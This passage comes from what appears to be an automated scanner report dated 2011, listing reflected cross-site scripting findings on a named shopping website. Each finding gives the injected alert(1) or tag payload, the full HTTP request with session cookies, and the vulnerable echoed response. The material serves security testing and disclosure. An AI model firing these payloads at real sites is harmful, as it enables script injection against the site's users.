The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3235'-alert(1)-'e0a4dbc25ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784d3235'-alert(1)-'e0a4dbc25ad/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:16:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784d3235'-alert(1)-'e0a4dbc25ad/Accessories/37';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.779. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b86'-alert(1)-'e4ce2f33919 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Accessoriesc0b86'-alert(1)-'e4ce2f33919/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:22:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessoriesc0b86'-alert(1)-'e4ce2f33919/37';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.780. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cea8'-alert(1)-'9184fa4d8d2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories/375cea8'-alert(1)-'9184fa4d8d2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:28:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories/375cea8'-alert(1)-'9184fa4d8d2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.781. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab316'-alert(1)-'6f23b0306e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingab316'-alert(1)-'6f23b0306e4/Clothing-Accessories/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shoppingab316'-alert(1)-'6f23b0306e4/Clothing-Accessories/194367784/Bags/40';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.782. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48186"><a>512069709a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping48186"><a>512069709a5/Clothing-Accessories/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:41:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping48186"><a>512069709a5">
...[SNIP]...

4.783. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1610'-alert(1)-'45c620a5884 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriese1610'-alert(1)-'45c620a5884/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:57:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessoriese1610'-alert(1)-'45c620a5884/194367784/Bags/40';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.784. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87b97<script>alert(1)</script>1c06cca41de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories87b97<script>alert(1)</script>1c06cca41de/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories87b97<script>alert(1)</script>1c06cca41de <a href="#" id="backlink">
...[SNIP]...

4.785. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8437'-alert(1)-'62563474686 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784c8437'-alert(1)-'62563474686/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:02:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784c8437'-alert(1)-'62563474686/Bags/40';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.786. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e198'-alert(1)-'7ee46bc00d5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Bags4e198'-alert(1)-'7ee46bc00d5/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:09:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Bags4e198'-alert(1)-'7ee46bc00d5/40';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.787. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82004'-alert(1)-'e4743644b8c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Bags/4082004'-alert(1)-'e4743644b8c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:13:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Bags/4082004'-alert(1)-'e4743644b8c';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.788. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c74"><a>4cce4fff839 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingd4c74"><a>4cce4fff839/Clothing-Accessories/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:08:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingd4c74"><a>4cce4fff839">
...[SNIP]...

4.789. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bead2'-alert(1)-'dab9ae7e52d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingbead2'-alert(1)-'dab9ae7e52d/Clothing-Accessories/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:19:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shoppingbead2'-alert(1)-'dab9ae7e52d/Clothing-Accessories/194367784/Clothing/8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.790. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe482<script>alert(1)</script>05c915e75c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessoriesfe482<script>alert(1)</script>05c915e75c3/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:32:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessoriesfe482<script>alert(1)</script>05c915e75c3 <a href="#" id="backlink">
...[SNIP]...

4.791. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3d8'-alert(1)-'93e2feb3b08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories5b3d8'-alert(1)-'93e2feb3b08/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
